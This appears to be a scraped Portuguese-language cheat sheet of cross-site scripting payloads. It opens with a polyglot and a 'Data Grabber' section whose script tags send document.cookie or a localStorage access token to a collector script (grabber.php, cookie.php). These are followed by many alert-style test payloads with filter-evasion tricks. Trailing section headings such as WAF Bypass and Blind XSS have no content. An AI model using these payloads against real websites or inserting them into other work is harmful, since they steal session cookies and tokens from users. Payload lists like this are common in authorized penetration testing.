XSS Payloads
Exemplos
One For All (Polyglot)
<img src=x>'"${{7*7}}Data Grabber (Cookie Stealing)
<script>document.location='http://localhost/XSS/grabber.php?c='+document.cookie</script>
<script>document.location='http://localhost/XSS/grabber.php?c='+localStorage.getItem('access_token')</script>
<script>new Image().src='http://localhost/cookie.php?c='+document.cookie;</script>
<script>new Image().src='http://localhost/cookie.php?c='+localStorage.getItem('access_token');</script>HTML & Applications (Basic Alerts)<script>al\u0065rt(1337)</script>
);alert('XSS
#1' onerror="alert('XSS')"
"><script>confirm(1)</script>
<script>alert(1)</script>
<script>alert('XSS')</script>
<script>alert('XSS')</script>
"><script>alert("XSS")</script>
"><script>alert(String.fromCharCode(88,83,83))</script>
<img src=x onerror=alert(1)>
<img src=x onerror=alert('XSS');>
<img src=x onerror=alert('XSS')//
<img src=x onerror=alert(String.fromCharCode(88,83,83));>
<img src=x oneonerrorrror=alert(String.fromCharCode(88,83,83));>
<img src=x:alert(alt) onerror=eval(src) alt=xss>
"><img src=x onerror=alert("XSS");>
"><img src=x onerror=alert(String.fromCharCode(88,83,83));>
javascript:alert("XSS")
#hTTP://[pastebin.com/raw/ycjGCXDY](https://pastebin.com/raw/ycjGCXDY) alert("XSS");
"/>%20<p+oncontentvisibilityautostatechange="alert(/CVE-Hunters/)"%20style="content-visibility:autoDoom (WASM Injection)
Markdown XSS
WAF Bypass & Obfuscation
Generic & Polyglots
Blind XSS (XSS.Report)
Encoded (XSS.Report)
XSS Hunter (Truffle Security)
Atualizado